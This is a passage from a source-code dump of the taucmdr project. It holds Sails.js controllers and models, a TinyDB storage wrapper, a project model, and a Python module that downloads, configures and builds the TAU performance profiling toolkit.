refs/heads/master
2020-04-01T14:32:10.649292
2015-04-07T23:27:09
2015-04-07T23:27:09
33,911,276
0
0
null
2015-04-14T04:46:17
2015-04-07T23:29:58
2015-04-13T17:31:51
null
[ { "alpha_fraction": 0.5835776925086975, "alphanum_fraction": 0.5835776925086975, "avg_line_length": 16, "blob_id": "5a2a07462a8b086ee131969f4a2cff7c91a9bec9", "content_id": "756b02f0126c70d003cbf80a118649b384bb0d5c", "detected_licenses": [ "BSD-2-Clause", "LicenseRef-scancode-unknown-license-reference" ], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 341, "license_type": "permissive", "max_line_length": 64, "num_lines": 20, "path": "/commander/api/controllers/FrontpageController.js", "repo_name": "gitter-badger/taucmdr", "src_encoding": "UTF-8", "text": "/**\n * FrontpageController\n *\n * @description :: Server-side logic for managing views\n * @help :: See http://links.sailsjs.org/docs/controllers\n */\n\nmodule.exports = {\n\n /**\n * Render the frontpage\n *\n * @param {Object} req\n * @param {Object} res\n */\n main: function (req, res) {\n res.view('frontpage/main');\n }\n\t\n};\n\n" }, { "alpha_fraction": 0.49934065341949463, "alphanum_fraction": 0.49934065341949463, "avg_line_length": 20.884614944458008, "blob_id": "e68ff79fac002fefd90aa0a35ffba67082db8616", "content_id": "14d20500a61e0e138de656a4e6388797fda12e7a", "detected_licenses": [ "BSD-2-Clause", "LicenseRef-scancode-unknown-license-reference" ], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 2275, "license_type": "permissive", "max_line_length": 75, "num_lines": 104, "path": "/commander/api/controllers/TargetController.js", "repo_name": "gitter-badger/taucmdr", "src_encoding": "UTF-8", "text": "/**\n * TargetController\n *\n * @description :: Server-side logic for managing targets\n * @help :: See http://links.sailsjs.org/docs/controllers\n */\n\n module.exports = {\n\n view: function(req, res, next) {\n Target.find({}).exec(function (err, targets) {\n if (err) {\n sails.log.error(err);\n return next(err);\n }\n if (!targets) {\n sails.log.warn('No targets found.');\n return next();\n }\n res.view({\n targets: targets\n });\n });\n },\n\n new: function(req, res, next) {\n res.view();\n },\n\n show: function(req, res, next) {\n var id = req.param('id');\n if (!id) return next();\n Target.findOne(id).exec(function (err, target) {\n if (err) {\n sails.log.error(err);\n return next(err);\n }\n if (!target) {\n sails.log.warn('Target ID '+id+' not found.');\n return next();\n }\n res.view({\n target: target\n });\n });\n },\n\n edit: function(req, res, next) {\n var id = req.param('id');\n if (!id) return next();\n Target.findOne(id).exec(function (err, target) {\n if (err) {\n sails.log.error(err);\n return next(err);\n }\n if (!target) {\n sails.log.warn('Target ID '+id+' not found.');\n return next();\n }\n res.view({\n target: target\n });\n });\n },\n\n create: function(req, res, next) {\n Target.create(req.params.all()).exec(function (err, target) {\n if (err) {\n sails.log.error(err);\n return next(err);\n }\n res.redirect('/target');\n });\n },\n\n update: function(req, res, next) {\n var id = req.param('id');\n if (!id) return next();\n Target.update({id: id}, req.params.all()).exec(function (err, target) {\n if (err) {\n sails.log.error(err);\n return next(err);\n }\n if (!target) {\n sails.log.warn('Target ID '+id+' not found.');\n return next();\n }\n res.redirect('/target/show/'+id);\n });\n },\n\n destroy: function(req, res, next) {\n var id = req.param('id');\n if (!id) return next();\n Target.destroy({id: id}).exec(function (err) {\n if (err) {\n sails.log.error(err);\n return next(err);\n }\n res.redirect('/target');\n });\n }\n\n};" }, { "alpha_fraction": 0.6543057560920715, "alphanum_fraction": 0.6562285423278809, "avg_line_length": 31.945701599121094, "blob_id": "2c8fd1741d0339888f483f99ef0a018256ea7016", "content_id": "9c12ef587e51345c68940c0471f58c3d1d1684dc", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 7281, "license_type": "permissive", "max_line_length": 99, "num_lines": 221, "path": "/packages/tau/storage.py", "repo_name": "gitter-badger/taucmdr", "src_encoding": "UTF-8", "text": "\"\"\"\n@file\n@author John C. Linford ([email protected])\n@version 1.0\n\n@brief \n\nThis file is part of the TAU Performance System\n\n@section COPYRIGHT\n\nCopyright (c) 2013, ParaTools, Inc.\nAll rights reserved.\n\nRedistribution and use in source and binary forms, with or without \nmodification, are permitted provided that the following conditions are met:\n (1) Redistributions of source code must retain the above copyright notice, \n this list of conditions and the following disclaimer.\n (2) Redistributions in binary form must reproduce the above copyright notice, \n this list of conditions and the following disclaimer in the documentation \n and/or other materials provided with the distribution.\n (3) Neither the name of ParaTools, Inc. nor the names of its contributors may \n be used to endorse or promote products derived from this software without \n specific prior written permission.\n\nTHIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\" \nAND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE \nIMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE \nDISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE \nFOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL \nDAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR \nSERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER \nCAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, \nOR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE \nOF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n\"\"\"\n\n# Sytem modules\nimport os\nfrom tinydb import TinyDB, where\n \n\n# TAU modules\nimport logger\nimport error\nimport util\nimport error\nimport environment as env\n\n\nLOGGER = logger.getLogger(__name__)\n\n\nclass StorageError(error.InternalError):\n \"\"\"\n Indicates that there is a problem with storage\n \"\"\"\n pass\n\n\nclass Storage(object):\n \"\"\"\n TODO: Classdocs\n \"\"\"\n def __init__(self, prefix, db_name='local.json'):\n \"\"\"\n Create the local storage location\n \"\"\"\n self._transaction_count = 0\n try:\n util.mkdirp(prefix)\n LOGGER.debug(\"Created '%s'\" % prefix)\n except:\n raise StorageError('Cannot create directory %r' % path, 'Check that you have `write` access')\n self.dbfile = os.path.join(prefix, db_name)\n try:\n self.db = TinyDB(self.dbfile)\n except:\n raise StorageError('Cannot create %r' % path, 'Check that you have `write` access')\n LOGGER.debug(\"Opened '%s' for read/write\" % self.dbfile)\n \n def __enter__(self):\n \"\"\"\n Initiates the database transaction\n \"\"\"\n if self._transaction_count == 0:\n self._db_copy = self.db._read()\n self._transaction_count += 1\n return self\n \n def __exit__(self, type, value, traceback):\n \"\"\"\n Finalizes the database transaction\n \"\"\"\n self._transaction_count -= 1\n if type and self._transaction_count == 0:\n self.db._write(self._db_copy)\n self._db_copy = None\n\n def _getQuery(self, keys, any):\n \"\"\"\n Returns a query object from a dictionary of keys\n \"\"\"\n operator = 'or' if any else 'and'\n def _and(lhs, rhs): return (lhs & rhs)\n def _or(lhs, rhs): return (lhs | rhs)\n join = {'and': _and, 'or': _or}[operator]\n iter = keys.iteritems()\n key, val = iter.next()\n query = (where(key) == val)\n for key, value in iter:\n query = join(query, (where(key) == value))\n return query\n\n def get(self, table_name, keys=None, any=False, eid=None):\n \"\"\"\n Return the record with the specified keys or element id\n \"\"\"\n table = self.db.table(table_name)\n if eid is not None:\n LOGGER.debug(\"%r: get(eid=%r)\" % (table_name, eid))\n return table.get(eid=eid)\n elif keys is not None:\n LOGGER.debug(\"%r: get(keys=%r)\" % (table_name, keys))\n return table.get(self._getQuery(keys, any))\n else:\n return None\n\n def search(self, table_name, keys=None, any=False):\n \"\"\"\n Return a list of records from the specified table that \n match any one of the provided keys\n \"\"\"\n table = self.db.table(table_name)\n if keys:\n LOGGER.debug(\"%r: search(keys=%r)\" % (table_name, keys))\n return table.search(self._getQuery(keys, any))\n else:\n LOGGER.debug(\"%r: all()\" % table_name)\n return table.all()\n\n def match(self, table_name, field, regex=None, test=None):\n \"\"\"\n Return a list of records where 'field' matches 'regex'\n \"\"\"\n table = self.db.table(table_name)\n if test is not None:\n LOGGER.debug('%r: search(where(%r).test(%r))' % (table_name, field, test))\n return table.search(where(field).test(test))\n elif regex is not None:\n LOGGER.debug('%r: search(where(%r).matches(%r))' % (table_name, field, regex))\n return table.search(where(field).matches(regex))\n else:\n LOGGER.debug(\"%r: search(where(%r).matches('.*'))\" % (table_name, field))\n return table.search(where(field).matches('.*'))\n \n def contains(self, table_name, keys=None, any=False, eids=None):\n \"\"\"\n Return True if the specified table contains at least one \n record that matches the provided keys or element IDs\n \"\"\"\n table = self.db.table(table_name)\n if eids is not None:\n LOGGER.debug(\"%r: contains(eids=%r)\" % (table_name, eids))\n if isinstance(eids, list):\n return table.contains(eids=eids)\n else:\n return table.contains(eids=[eids])\n elif keys:\n LOGGER.debug(\"%r: contains(keys=%r)\" % (table_name, keys))\n return table.contains(self._getQuery(keys, any))\n else:\n return False\n\n def insert(self, table_name, fields):\n \"\"\"\n Create a new record in the specified table\n \"\"\"\n LOGGER.debug(\"%r: Inserting %r\" % (table_name, fields))\n return self.db.table(table_name).insert(fields)\n \n def update(self, table_name, fields, keys=None, any=False, eids=None):\n \"\"\"\n Updates the record that matches keys to contain values from fields\n \"\"\"\n table = self.db.table(table_name)\n if eids is not None:\n LOGGER.debug(\"%r: update(%r, eids=%r)\" % (table_name, fields, eids))\n if isinstance(eids, list):\n return table.update(fields, eids=eids)\n else:\n return table.update(fields, eids=[eids])\n else:\n LOGGER.debug(\"%r: update(%r, keys=%r)\" % (table_name, fields, keys))\n return table.update(fields, self._getQuery(keys, any))\n\n def remove(self, table_name, keys=None, any=False, eids=None):\n \"\"\"\n Remove all records that match keys or eids from table_name \n \"\"\"\n table = self.db.table(table_name)\n if eids is not None:\n LOGGER.debug(\"%r: remove(eids=%r)\" % (table_name, eids))\n if isinstance(eids, list):\n return table.remove(eids=eids)\n else:\n return table.remove(eids=[eids])\n else:\n LOGGER.debug(\"%r: remove(keys=%r)\" % (table_name, keys))\n return table.remove(self._getQuery(keys, any))\n\n def purge(self, table_name):\n \"\"\"\n Removes all records from the table_name\n \"\"\"\n LOGGER.debug(\"%r: purge()\" % (table_name))\n return self.db.table(table_name).purge()\n\n\nuser_storage = Storage(env.USER_PREFIX, 'local.json')\nsystem_storage = Storage(env.SYSTEM_PREFIX, 'local.json')\n" }, { "alpha_fraction": 0.529411792755127, "alphanum_fraction": 0.529411792755127, "avg_line_length": 14.850000381469727, "blob_id": "a4459e39dfa88f31a14fe76595124317b4a0e512", "content_id": "760c28a3d67973c1fcbe7c3d5ed77248c3a91ead", "detected_licenses": [ "BSD-2-Clause", "LicenseRef-scancode-unknown-license-reference" ], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 952, "license_type": "permissive", "max_line_length": 108, "num_lines": 60, "path": "/commander/api/models/Target.js", "repo_name": "gitter-badger/taucmdr", "src_encoding": "UTF-8", "text": "/**\n* Target.js\n*\n* @description :: TODO: You might write a short summary of how this model works and what it represents here.\n* @docs :: http://sailsjs.org/#!documentation/models\n*/\n\nmodule.exports = {\n\n schema: true,\n\n attributes: {\n\n // One-to-many association\n user: {\n model: 'User', \n required: true \n },\n\n // Projects this target belongs to\n projects: {\n collection: 'Project',\n via: 'targets'\n },\n\n // Target name\n name: {\n type: 'string',\n required: true\n },\n\n // Host OS\n host_os: {\n type: 'string',\n required: true\n },\n\n // Host architecture\n host_arch: {\n type: 'string',\n required: true\n },\n\n // Coprocessing device architecture\n device_arch: {\n type: 'string'\n },\n\n compilers: {\n collection: 'Compiler',\n via: 'target'\n },\n\n packages: {\n collection: 'Package',\n via: 'target'\n }\n\n }\n};\n\n" }, { "alpha_fraction": 0.657038688659668, "alphanum_fraction": 0.6595625281333923, "avg_line_length": 31.42727279663086, "blob_id": "6ba4ffb31e4a0d52e9f01a981259b4fd756d1171", "content_id": "1ce5a970e225e321e72103b813073fb082942332", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3566, "license_type": "permissive", "max_line_length": 96, "num_lines": 110, "path": "/packages/tau/model/project.py", "repo_name": "gitter-badger/taucmdr", "src_encoding": "UTF-8", "text": "\"\"\"\n@file\n@author John C. Linford ([email protected])\n@version 1.0\n\n@brief\n\nThis file is part of the TAU Performance System\n\n@section COPYRIGHT\n\nCopyright (c) 2013, ParaTools, Inc.\nAll rights reserved.\n\nRedistribution and use in source and binary forms, with or without \nmodification, are permitted provided that the following conditions are met:\n (1) Redistributions of source code must retain the above copyright notice, \n this list of conditions and the following disclaimer.\n (2) Redistributions in binary form must reproduce the above copyright notice, \n this list of conditions and the following disclaimer in the documentation \n and/or other materials provided with the distribution.\n (3) Neither the name of ParaTools, Inc. nor the names of its contributors may \n be used to endorse or promote products derived from this software without \n specific prior written permission.\n\nTHIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\" \nAND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE \nIMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE \nDISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE \nFOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL \nDAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR \nSERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER \nCAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, \nOR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE \nOF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n\"\"\"\n\n# System modules\nimport os\nimport string\nimport shutil\n\n# TAU modules\nimport util\nimport error\nimport environment as env\nimport controller as ctl\n\n\nclass Project(ctl.Controller, ctl.ByName):\n \"\"\"\n Project data model controller\n \"\"\"\n \n attributes = {\n 'name': {\n 'type': 'string',\n 'unique': True,\n 'argparse': {'help': 'Project name',\n 'metavar': '<project_name>'}\n },\n 'targets': {\n 'collection': 'Target',\n 'via': 'projects',\n },\n 'applications': {\n 'collection': 'Application',\n 'via': 'projects',\n },\n 'measurements': {\n 'collection': 'Measurement',\n 'via': 'projects',\n },\n 'experiments': {\n 'collection': 'Experiment',\n 'via': 'project'\n },\n 'prefix': {\n 'type': 'string',\n 'required': True,\n 'defaultsTo': env.USER_PREFIX,\n 'argparse': {'flags': ('--home',),\n 'help': 'Location for all files and experiment data related to this project',\n 'metavar': 'path'}\n },\n }\n\n _valid_name = set(string.digits + string.letters + '-_.')\n \n def prefix(self):\n return os.path.join(self['prefix'], self['name'])\n \n def onCreate(self):\n if set(self['name']) > Project._valid_name:\n raise ctl.ModelError('%r is not a valid project name.' % self['name'],\n 'Use only letters, numbers, dot (.), dash (-), and underscore (_).')\n prefix = self.prefix()\n try:\n util.mkdirp(prefix)\n except Exception as err:\n raise error.ConfigurationError('Cannot create directory %r: %s' % (prefix, err), \n 'Check that you have `write` access')\n\n def onDelete(self):\n prefix = self.prefix()\n try:\n shutil.rmtree(prefix)\n except Exception as err:\n if os.path.exists(prefix):\n LOGGER.error(\"Could not remove project data at '%s': %s\" % (prefix, err))" }, { "alpha_fraction": 0.6033194661140442, "alphanum_fraction": 0.6058917045593262, "avg_line_length": 33.96359634399414, "blob_id": "a6d4ebd2da5e1f1e7adcb444b191b5f323cffc56", "content_id": "bbfc292ad703a9fac103bfdd0b454a1923e08041", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 16328, "license_type": "permissive", "max_line_length": 174, "num_lines": 467, "path": "/packages/tau/cf/tau.py", "repo_name": "gitter-badger/taucmdr", "src_encoding": "UTF-8", "text": "\"\"\"\n@file\n@author John C. Linford ([email protected])\n@version 1.0\n\n@brief\n\nThis file is part of the TAU Performance System\n\n@section COPYRIGHT\n\nCopyright (c) 2013, ParaTools, Inc.\nAll rights reserved.\n\nRedistribution and use in source and binary forms, with or without \nmodification, are permitted provided that the following conditions are met:\n (1) Redistributions of source code must retain the above copyright notice, \n this list of conditions and the following disclaimer.\n (2) Redistributions in binary form must reproduce the above copyright notice, \n this list of conditions and the following disclaimer in the documentation \n and/or other materials provided with the distribution.\n (3) Neither the name of ParaTools, Inc. nor the names of its contributors may \n be used to endorse or promote products derived from this software without \n specific prior written permission.\n\nTHIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\" \nAND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE \nIMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE \nDISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE \nFOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL \nDAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR \nSERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER \nCAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, \nOR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE \nOF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n\"\"\"\n\n# System modules\nimport os\nimport sys\nimport glob\nimport errno\n\n# TAU modules\nimport logger\nimport util\nimport error\nimport environment\n\n\nLOGGER = logger.getLogger(__name__)\n\nDEFAULT_SOURCE = {None: 'http://tau.uoregon.edu/tau.tgz'}\n\nCOMPILER_WRAPPERS = {'CC': 'tau_cc.sh',\n 'CXX': 'tau_cxx.sh',\n 'FC': 'tau_f90.sh',\n 'UPC': 'tau_upc.sh'}\n\nCOMMANDS = [\n 'jumpshot',\n 'paraprof',\n 'perfdmf_configure',\n 'perfdmf_createapp',\n 'perfdmf_createexp',\n 'perfdmfdb.py',\n 'perfdmf_loadtrial',\n 'perfexplorer',\n 'perfexplorer_configure',\n 'phaseconvert',\n 'pprof',\n 'ppscript',\n 'slog2print',\n 'tau2slog2',\n 'tau_analyze',\n 'taucc',\n 'tau_cc.sh',\n 'tau_compiler.sh',\n 'tau-config',\n 'tau_convert',\n 'taucxx',\n 'tau_cxx.sh',\n 'taudb_configure',\n 'taudb_install_cert',\n 'taudb_keygen',\n 'taudb_loadtrial',\n 'tau_ebs2otf.pl',\n 'tau_ebs_process.pl',\n 'tauex',\n 'tau_exec',\n 'tau_f77.sh',\n 'tauf90',\n 'tau_f90.sh',\n 'tau_gen_wrapper',\n 'tau_header_replace.pl',\n 'tauinc.pl',\n 'tau_java',\n 'tau_javamax.sh',\n 'tau_macro.sh',\n 'tau_merge',\n 'tau_multimerge',\n 'tau_pebil_rewrite',\n 'tau_reduce',\n 'tau_resolve_addresses.py',\n 'tau_rewrite',\n 'tau_selectfile',\n 'tau_show_libs',\n 'tau_throttle.sh',\n 'tau_treemerge.pl',\n 'tauupc',\n 'tau_upc.sh',\n 'tau_user_setup.sh',\n 'trace2profile'\n]\n\n\ndef _parseConfig(config, commandline_opts, environment_vars):\n \"\"\"\n TODO: Docs\n \"\"\"\n opts = set()\n envs = dict()\n for key, val in config.iteritems():\n try:\n option = commandline_opts[key]\n except KeyError:\n pass\n else:\n try:\n opts |= set(option(val))\n except TypeError:\n try:\n opts |= set(option[val])\n except KeyError:\n raise error.InternalError('Invalid TAU configuration parameter: %s=%s' % (key, val))\n try:\n option = environment_vars[key]\n except KeyError:\n pass\n else:\n try:\n envs.update(option(val))\n except TypeError:\n try:\n envs.update(option[val])\n except KeyError:\n raise error.InternalError('Invalid TAU configuration parameter: %s=%s' % (key, val))\n return list(opts), envs\n\nclass Tau(object):\n \"\"\"\n Encapsulates a TAU installation\n \"\"\"\n def __init__(self, prefix, cc, cxx, fc, src, arch, \n pdt, bfd, libunwind, **config):\n if not arch:\n arch = _detectDefaultHostArch()\n if src.lower() == 'download':\n try:\n src = DEFAULT_SOURCE[arch]\n except KeyError:\n src = DEFAULT_SOURCE[None]\n self.prefix = prefix\n self.cc = cc\n self.cxx = cxx\n self.fc = fc\n self.src = src\n self.arch = arch\n self.pdt = pdt\n self.bfd = bfd\n self.libunwind = libunwind\n if os.path.isdir(src):\n self.tau_prefix = src\n else:\n compiler_prefix = '.'.join([str(c.eid) for c in cc, cxx, fc if c])\n self.tau_prefix = os.path.join(prefix, 'tau', compiler_prefix)\n self.src_prefix = os.path.join(prefix, 'src')\n self.include_path = os.path.join(self.tau_prefix, 'include')\n self.arch_path = os.path.join(self.tau_prefix, arch)\n self.bin_path = os.path.join(self.arch_path, 'bin')\n self.lib_path = os.path.join(self.arch_path, 'lib')\n self.config = config\n self.config['halt_build_on_error'] = False # This feels hacky\n\n def getTags(self):\n \"\"\"\n TODO: Docs\n \"\"\"\n tags = []\n config = self.config\n \n family = self.cc['family']\n if family != 'GNU':\n compiler_tags = {'Intel': 'icpc', 'PGI': 'pgi'}\n try:\n tags.append(compiler_tags[family])\n except KeyError:\n raise error.InternalError(\"No makefile tag specified to compiler family '%s'\" % family)\n \n if config['source_inst']:\n tags.append('pdt')\n if config['openmp_support']:\n openmp_tags = {'ignore': 'openmp',\n 'ompt': 'ompt',\n 'opari': 'opari'}\n tags.append(openmp_tags[config['openmp_measurements']])\n if config['pthreads_support']:\n tags.append('pthread')\n if config['mpi_support']:\n tags.append('mpi')\n if config['cuda_support']:\n tags.append('cuda') \n if config['shmem_support']:\n tags.append('shmem')\n if config['mpc_support']:\n tags.append('mpc')\n \n LOGGER.debug(\"TAU tags: %s\" % tags)\n return tags\n\n def verify(self):\n \"\"\"\n Returns true if if there is a working TAU installation at `prefix` with a\n directory named `arch` containing `bin` and `lib` directories or \n raises a ConfigurationError describing why that installation is broken.\n \"\"\"\n LOGGER.debug(\"Checking TAU installation at '%s' targeting arch '%s'\" % (self.tau_prefix, self.arch)) \n if not os.path.exists(self.tau_prefix):\n raise error.ConfigurationError(\"'%s' does not exist\" % self.tau_prefix)\n \n # Check for all commands\n for cmd in COMMANDS:\n path = os.path.join(self.bin_path, cmd)\n if not os.path.exists(path):\n raise error.ConfigurationError(\"'%s' is missing\" % path)\n if not os.access(path, os.X_OK):\n raise error.ConfigurationError(\"'%s' exists but is not executable\" % path)\n \n # Check that there is at least one makefile\n makefile = os.path.join(self.include_path, 'Makefile')\n if not os.path.exists(makefile):\n raise error.ConfigurationError(\"'%s' does not exist\" % makefile)\n \n # Check for Makefile.tau matching this configuration\n makefile = self.getMakefile()\n if not makefile:\n raise error.ConfigurationError(\"TAU Makefile not found: %s\" % makefile)\n \n # Open makefile, check BFDINCLUDE, UNWIND_INC\n LOGGER.debug(\"Tau Makefile %s :\" %makefile)\n with open(makefile, 'r') as myMakeFile:\n data = myMakeFile.readlines()\n for line in data:\n if ('BFDINCLUDE=' in line):\n mfBfdInc=line.split('=')[1].strip().strip(\"-I\")\n if (self.bfd.include_path != mfBfdInc):\n raise error.ConfigurationError(\"TAU Makefile does not have BFDINCLUDE = %s set to the BFD_INCLUDE_PATH = %s \" % (mfBfdInc,self.bfd.include_path)) \n if ('UNWIND_INC=' in line):\n mfUwInc=line.split('=')[1].strip().strip(\"-I\")\n if (self.libunwind.include_path != mfUwInc):\n raise error.ConfigurationError(\"TAU Makefile does not have UNWIND_INC= {} set to the LIBUNWIND_INCLUDE_PATH = {}\".format(mfUwInc,self.libunwind.include_path)) \n \n #matching bfd.include_path\n # grep for BFDINCLUDE\n # !! not found, raise error.ConfigurationError(\"BFD not configured in %s\" % makefile)\n # .... similar for libunwind\n \n LOGGER.debug(\"TAU installation at '%s' is valid\" % self.tau_prefix)\n return True\n\n def install(self, force_reinstall=False):\n \"\"\"\n TODO: Docs\n \"\"\"\n LOGGER.debug(\"Initializing TAU at '%s' from '%s' with arch=%s\" % \n (self.tau_prefix, self.src, self.arch))\n \n # Check if the installation is already initialized\n if not force_reinstall:\n try:\n return self.verify()\n except error.ConfigurationError, err:\n LOGGER.debug(err)\n LOGGER.info('Starting TAU installation')\n \n # Download, unpack, or copy TAU source code\n dst = os.path.join(self.src_prefix, os.path.basename(self.src))\n src = os.path.join(self.tau_prefix, 'src')\n LOGGER.debug(\"Checking for TAU source at '%s'\" % src)\n if os.path.exists(src):\n LOGGER.debug(\"Found source at '%s'\" % src)\n srcdir = src\n else:\n LOGGER.debug(\"Source not found, aquiring from '%s'\" % self.src)\n try:\n util.download(self.src, dst)\n srcdir = util.extract(dst, self.src_prefix)\n except IOError:\n raise error.ConfigurationError(\"Cannot acquire source file '%s'\" % self.src,\n \"Check that the file or directory is accessable\")\n finally:\n try: os.remove(dst)\n except: pass\n\n # TAU's configure script has a goofy way of specifying the fortran compiler\n if self.fc:\n if self.fc['family'] != 'MPI':\n family_map = {'GNU': 'gfortran', \n 'Intel': 'intel'}\n fc_family = self.fc['family']\n try:\n fortran_flag = '-fortran=%s' % family_map[fc_family]\n except KeyError:\n raise InternalError(\"Unknown compiler family for Fortran: '%s'\" % fc_family)\n else:\n # TODO: Recognize family from MPI compiler\n raise InternalError(\"Unknown compiler family for Fortran: '%s'\" % fc_family)\n else:\n fortran_flag = ''\n \n # Check PDT\n if bool(self.config['source_inst']) != bool(self.pdt):\n raise error.InternalError(\"pdt=%s but config['source_inst']=%s\" % (self.pdt, self.config['source_inst']))\n\n # Check BFD\n if (self.config['sample'] or self.config['compiler_inst'] != 'never') and (not self.bfd):\n LOGGER.warning(\"BFD is recommended when using sampling or compiler-based instrumentation\")\n\n # Check libunwind\n if (bool(self.config['sample']) or bool(self.config['openmp_support'])) != bool(self.libunwind):\n LOGGER.warning(\"libunwind is recommended when using sampling or OpenMP\")\n\n # Gather TAU configuration flags\n base_flags = ['-prefix=%s' % self.tau_prefix, \n '-arch=%s' % self.arch, \n '-cc=%s' % self.cc['command'] if self.cc else '', \n '-c++=%s' % self.cxx['command'] if self.cxx else '', \n fortran_flag,\n '-pdt=%s' % self.pdt.pdt_prefix if self.pdt else '',\n '-bfd=%s' % self.bfd.bfd_prefix if self.bfd else '',\n '-unwind=%s' % self.libunwind.libunwind_prefix if self.libunwind else '']\n if self.config['mpi_support']:\n mpi_flags = ['-mpi'\n # TODO: -mpiinc, -mpilib, -mpilibrary\n ]\n else:\n mpi_flags = []\n if self.config['openmp_support']:\n openmp_flags = ['-openmp']\n measurements = self.config['openmp_measurements'] \n if measurements == 'ompt':\n if self.cc['family'] == 'Intel':\n openmp_flags.append('-ompt')\n else:\n raise error.ConfigurationError('OMPT for OpenMP measurement only works with Intel compilers')\n elif measurements == 'opari':\n openmp_flags.append('-opari')\n else:\n openmp_flags = []\n if self.config['pthreads_support']:\n pthreads_flags = ['-pthread']\n else:\n pthreads_flags = []\n\n # Execute configure\n cmd = ['./configure'] + base_flags + mpi_flags + openmp_flags + pthreads_flags\n LOGGER.info(\"Configuring TAU...\")\n if util.createSubprocess(cmd, cwd=srcdir, stdout=False):\n raise error.ConfigurationError('TAU configure failed')\n \n # Execute make\n cmd = ['make', '-j4', 'install']\n LOGGER.info('Compiling TAU...')\n if util.createSubprocess(cmd, cwd=srcdir, stdout=False):\n raise error.ConfigurationError('TAU compilation failed.')\n\n # Leave source, we'll probably need it again soon\n # Create a link to the source for reuse\n LOGGER.debug('Preserving %r for future use' % srcdir)\n try:\n os.symlink(srcdir, src)\n except OSError as err:\n if not (err.errno == errno.EEXIST and os.path.islink(src)):\n LOGGER.warning(\"Can't create symlink '%s'. TAU source code won't be reused across configurations.\" % src)\n \n # Verify the new installation and return\n LOGGER.info('TAU installation complete')\n return self.verify()\n\n def getMakefile(self):\n \"\"\"\n Returns an absolute path to a TAU_MAKEFILE\n \"\"\"\n config_tags = set(self.getTags())\n if not len(config_tags):\n return 'Makefile.tau'\n tau_makefiles = glob.glob(os.path.join(self.lib_path, 'Makefile.tau*'))\n for makefile in tau_makefiles:\n tags = set(os.path.basename(makefile).split('.')[1].split('-')[1:])\n if tags <= config_tags and config_tags <= tags:\n return os.path.join(self.lib_path, makefile)\n LOGGER.debug(\"No TAU makefile matches tags '%s'. Available: %s\" % (config_tags, tau_makefiles))\n return None\n\n def applyCompiletimeConfig(self, opts, env):\n \"\"\"\n TODO: Docs\n \"\"\"\n commandline_options = {\n 'halt_build_on_error': {True: [], False: ['-optRevert']},\n 'verbose': {True: ['-optVerbose'], False: ['-optQuiet']},\n 'compiler_inst': {'always': ['-optCompInst'], \n 'never': ['-optNoCompInst'],\n 'fallback': ['-optRevert', '-optNoCompInst']}\n }\n environment_variables = {} \n tauOpts, tauEnv = _parseConfig(self.config, commandline_options, environment_variables)\n opts.extend(tauOpts)\n env.update(tauEnv)\n env['PATH'] = os.pathsep.join([self.bin_path, env.get('PATH')])\n env['TAU_MAKEFILE'] = self.getMakefile()\n\n def applyRuntimeConfig(self, opts, env):\n \"\"\"\n TODO: Docs\n \"\"\"\n commandline_options = {\n 'verbose': {True: ['-v'], False: []},\n 'sample': {True: ['-ebs'], False: []}\n }\n environment_variables = {\n 'verbose': {True: {'TAU_VERBOSE': '1'}, \n False: {'TAU_VERBOSE': '0'}},\n 'profile': {True: {'TAU_PROFILE': '1'}, \n False: 